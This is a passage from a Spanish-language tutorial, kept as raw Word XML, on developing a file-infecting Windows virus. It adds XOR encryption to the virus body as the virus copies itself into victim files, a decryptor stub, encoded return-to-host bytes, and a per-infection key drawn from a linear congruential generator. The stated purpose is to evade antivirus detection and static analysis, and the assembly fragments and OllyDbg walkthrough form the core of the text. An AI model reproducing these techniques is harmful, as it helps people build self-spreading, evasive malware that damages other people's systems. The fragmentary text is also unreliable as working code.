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cultando el virus: Encriptación</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el virus listo y funcional, salvo obviamente por un tema de optimización y mejoras varias a realizarse, pero que es útil a quien quiere aprender a programar uno y también para tener una base sobre la cual poder trabajar en técnicas más complej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vamos a hacer ahora es comenzar a ocultarlo un poco, y para eso el primer paso  es la encriptación. No significa que al encriptarlo lo hagamos invisible para los antivirus, pero es un primer paso para comenzar a ocultarlo y junto con otras técnicas,  dificultar el desensamblado y su análisis estátic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siempre, vamos a realizar todo el proceso paso a paso para que quede bien claro, y que a partir de esto ustedes puedan seguir investigando por su cuenta y probando nuevas alternativ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varias formas de encriptar el código, pero vamos a ver una que es muy sencilla y además bastante utilizada, y es la encriptación por sustitución a través de la operación XOR. La ventaja de esta técnica es que vamos a utilizar el mismo procedimiento para encriptar como para desencriptar nuestro virus, ya que la operación binaria xor es revers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bien por sí sola es muy vulnerable, puede ser utilizada en combinación con otros métodos, lo que le da una gran fortaleza. La idea es muy sencilla, necesitamos una clave para encriptar/desencritptar, y hacemos un xor a cada opcode que deseamos ocultar. </w:t>
        <w:br/>
        <w:t>Veamos esto con un ejemplo sencil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lor a encriptar: 1Ah</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Clave: 05h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado encriptado: 1Ah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 05h = 1F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vertirlo, simplemente hacemos un nuevo xor con la misma clave (05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Resultado desencriptado: 1Fh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 05h = 1Ah (volvemos al número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lo podemos probar con la calculadora de Windows, la pasamos a modo Científico y Hexadecimal y tenemos todas las operaciones para realiz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93878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38780" cy="19469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punto a favor que tiene este método es que es muy fácil implementarlo en assembl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a modificar nuestro código para ver como generamos esta encriptación. Muchos autores de virus generan un programa aparte para encriptar el virus en su primera generación, nosotros vamos a hacer que esta rutina esté dentro del mismo virus para que sea más sencillo y efic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con la codificación, y el mejor momento para realizar esto es cuando copiamos el virus al archivo víctima. Ubiquemos la rutina de copia y modifiquemos el código simplemente para que antes de copiarse realice una encriptación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estab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o deberíamos dejar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                              ; puntero para direccionar la memoria en la cop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criptacio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byte ptr [esi + eb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op    encriptaci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ásicamente lo que hacemos es utilizar el registro ebx como un puntero para ir direccionando la memoria a copiar, luego en vez de pasar directamente de un lugar de memoria a otro como hacíamos con movsb, ahora lo copiamos primero en al, le aplicamos la encriptación xor con una clave cualquiera (en este caso 0CCh), y recién ahí lo pasamos a la dirección de memoria d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ilemos hasta acá y veamos cómo funciona. Para eso abrámoslo en OllyDbg y ubiquemos la rutina de copia, y coloquemos un BP al inicio de la mis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995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699510" cy="11087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con F9 hasta que pare en el BP y ubiquemos la zona de memoria donde va a realizar esta copia, para eso nos paramos sobre el registro EDI (destino de la copia) y presionamos botón derecho del mouse -&gt; Follow in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829435"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829435" cy="159321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emos con F8 varias veces para que veamos cómo va realizando la copia y los opcodes que va carg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1565" cy="74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2" r="-8" b="-42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3631565" cy="74168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robemos esto, si tomamos por ejemplo los 7 primeros opcodes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C  50  24  CC  CC  CC  CC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Si tomamos la calculadora y le hacemos un xor a estos números ob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60  9C  E8  00  00  00  00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l inicio del código de nuestro virus y veamos los opcodes de l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131185" cy="54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5" r="-9" b="-55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3131185" cy="54165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coinciden con los que obtuvimos anteriormente, esto quiere decir que está realizando la copia del nuevo virus ya encriptado con la función xor. Si queremos podemos dejar que termine de infectar los archivos de prueba y luego podemos abrirlos para ver que efectivamente codifica todo el virus copiado. Tengamos en cuenta que no podremos ejecutar este nuevo archivo ya no le hemos incluido la rutina de desencriptado y si tratamos de correrlo va a dar un err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comenzar con la rutina de desencriptado, bosquejemos cual es la idea para que tengamos en claro lo que queremos hac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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:object w:dxaOrig="13617" w:dyaOrig="8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75pt;height:274.65pt" filled="f" o:ole="">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId7" DrawAspect="Content" ObjectID="_731962794" r:id="rId7"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esto significa que cuando copiemos el virus no vamos a tener que encriptar todo, sino que vamos a tener que dejar una parte sin codificar para que cuando se ejecute el archivo infectado, lo primero que haga esta porción de código sea desencriptar el resto para que se pueda ejecutar normal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realizar esto necesitamos marcar dentro del virus que parte queremos que sea encriptada y que parte no, así cuando lo copiemos podremos diferenciarla. Para hacer esto vamos a etiquetar desde donde queremos que comience a encriptar, para esto tenemos que modificar el inicio del código, justo después del cálculo del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del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l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 rutina de desencriptado  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debemos comprobar si estamos en la primera infección (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cmp  ebp, 0h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), en cuyo caso saltamos la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ahora modifiquemos la rutina de copia para que no encripte la porción de código que está entre la etiqueta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iniciovir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inicioEncriptado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, para esto definimos una constante en nuestra zona de datos que contenga el tamaño de est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amSinEncrip   equ inicioEncriptado -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modifiquemos la rutina de copia para tener esto en cuenta, simplemente reemplazamos la instrucción  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">xor al, 0CCh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>por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tamSinEncrip</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jb        noEncrip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Encrip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esto preguntamos si el puntero que utilizamos para realizar la copia (EBX) es menor que el tamaño de la sección que no queremos encriptar, en cuyo caso salta la instrucción xor y copia el código tal cual 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robemos hasta acá para que veamos cómo funciona. Compilemos y ejecutémoslo en el entorno de pruebas que teníamos (donde hay varias copias del programa simple que mostraba un mensaje por pantalla). Como vimos anteriormente, nos damos cuenta que archivos están infectados por el cambio de tamañ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1450"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33" r="-11" b="-33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2711450" cy="8851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ramos cualquiera de ellos con el OllyDbg y veamos las primer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20185" cy="149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9" r="-7" b="-19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4020185" cy="1494790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vemos que las primeras instrucciones (hasta la etiqueta inicioEncriptado) está normal, y de ahí en más el código es totalmente ileg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debemos de olvidarnos de algo, sino luego nos va a dar mil dolores de cabeza. Además de esta rutina de copia, también tenemos que tener en cuenta la modificación del código que realizamos más adelante para armar el retorno al OEP del host, ahora está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También necesitaremos codificarla, para que luego cuando desencriptemos el virus quede correcta, por lo que tenemos agregar justo debajo de esta instrucción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0],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1],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2],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odríamos haberlo hecho directamente con un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xor [edi], 0CCCCCCCCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y funcionaría igual, pero utilizamos esta forma para ir dejando el código listo para algo que vamos a hacer más adela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pasemos a la rutina de desencriptado que tenemos al principio de la ejecución, es muy simple, v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lea       edi, [ebp + offset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crip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edi +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finvir -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                             ; termina y continúa l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desencrip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poco que hace esta rutina. En el registro EDI tenemos el inicio de la sección a desencriptar y vamos a utilizar nuevamente EBX como puntero para ir señalando las distintas direcciones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hacemos un ciclo donde vamos desencriptando cada byte con la instrucción xor (con la clave 0CCh) hasta que completamos todo el código encriptado (tamaño = finvir -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a vez que terminamos, continuamos con la ejecución norm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si todo marcha bien, para eso compilemos y ejecutemos una vez el virus, y luego abramos en el OllyDbg unas de las copias infect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07485" cy="187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4007485" cy="18757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í vemos la rutina de desinfección, ahora tengamos presionada la tecla F8 para ejecutarlo y vamos a ver cómo se va desencriptando y nos va quedando el código origin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ngamos ahora un BP justo después de la rutina de desencript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221990" cy="165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7" r="-9" b="-17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3221990" cy="165290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todo hasta ahí con F9, vemos que todo el código quedó desencriptado y listo para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2200" cy="207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 r="-8" b="-14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3632200" cy="20707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continuamos la ejecución hasta el final con F9, vamos a ver que el virus se comporta correctamente, sin problem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hasta acá quedó listo y funcionando, podemos agregar que además hay varias instrucciones que podemos utilizar para encriptar nuestro espécimen además de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6946" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="279" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3348"/>
        <w:gridCol w:w="3598"/>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encriptación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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desencriptación</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a veces la operación para encriptar es distinta que la utilizada para desencriptar. Pueden probar cualquiera de estas, pero tengan cuidado con los desbordamientos en alguna de ellas. Para mejorar la rutina de encriptación se pueden utilizar varias instrucciones a la vez.</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tinuemos, otra fortaleza que le podemos agregar a la rutina que hicimos es hacer que la clave sea variable de infección en infección, para eso no tenemos que utilizar una constante como hicimos hasta acá (0CCh), sino un valor variable. Obviamente este valor (clave) debemos incluirlo en el archivo infectado para que este se pueda luego decodificar en el momento de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este valor no puede estar dentro del código encriptado, lo podemos definir al inicio del nuestro código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salta_dato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lave   db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alta_dat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finimos una clave (por ahora inicializada en 0CCh), y tenemos que agregar una instrucción de salto para que Windows no trate de ejecutarla como si fuera código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reemplazar en nuestro código todos los lugares donde aparece la clave 0CCh por esta variable (+EBP, recordemos lo del delta offset). Ojo porque como ahora no estamos utilizando una constante, tenemos que indicarle al compilador el tamaño de lo que queremos copiar (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>byte ptr</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í no:                    xor     al,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sí está correcto:     xor     al, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>byte ptr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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l caso de los bytes que corresponden al OEP, primero deberemos pasar el valor de la clave a un registro (en este caso EBX), y luego si encriptar los opcod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zx   ebx, byte ptr [ebp + offset clav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0],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1],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2], bl</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b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eremos podemos ejecutar nuevamente el código y comprobar en el OllyDbg que funciona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lo que tenemos que hacer es modificar aleatoriamente esa variable (clave) para cada ejecución, y para eso vamos a necesitar una rutina que me genere número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rutinas para realizar esto, yo elegí una por su simplicidad y además porque es bastante eficiente para generar números que no se repiten. Es muy utilizada en muchos lenguajes de program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tendámonos un momento de nuestro virus y veamos cómo funciona esta rutina de generación de números aleatorios. Una aclaración, en realidad son números pseudoaleatorios ya que se parte de un número (llamado semilla) y a partir de allí se genera una serie de números aleatorios x1, x2, x3, …., pero siempre que partamos de la misma semilla vamos a obtener la misma secuencia de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l algoritmo que vamos a utilizar se llama </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>generador de congruencia lineal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y está basado en la siguiente relación de recurr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b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>n+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  =  (a X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> + c)  mod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Do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r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : módulo (m &gt; 0)</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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  : constante multiplicativa (0 &lt; a &lt; m)</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c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  : constante aditiva (0 &lt;= c &lt;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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Puede parecer complejo, pero en realidad es muy simple, necesitamos 4 valores constantes (m, a, c y el valor inicial o semilla X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), el resto se calcula con unas sencillas operaciones matemátic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ejemplo, vamos a seleccionar los siguiente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m  = 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a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c   = 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 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alculemos los primeros números de la secu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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (5 *   1 + 3) mod 32 =   8</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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (5 *   8 + 3) mod 32 = 11</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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (5 * 11 + 3) mod 32 = 26</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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (5 * 26 + 3) mod 32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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (5 *   5 + 3) mod 32 = 28</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me va generando la secuencia de números pseudoaleatorios : 8, 11, 26, 5, 28,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ieren probar esto pueden utilizar Excel, con la siguiente fórmu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RESIDUO (($B$2*B6+$B$3);$B$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ó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2 = a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>B6 = X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>n-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B3 = c</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1 =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spués lo pueden pasar a hexadecimal utilizando la función DEC.A.HE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001520"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1" r="-15" b="-11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2001520" cy="26536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 xml:space="preserve">Podemos inferir dos cosas de esto, una es que si comenzamos por la misma semilla (cualquiera sea su valor) la secuencia va a ser la misma. Y además al hacer al final de la fórmula </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mod m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, que es lo mismo que decir el residuo o resto de dividir por </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, nos aseguramos que el valor máximo que va a tomar el número generado es justamente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (esto no lo explico porque es una propiedad de la división y creo que todos la conoc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Justamente vamos a usar esas constantes en nuestro código (m=32, a=5, c=3, X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
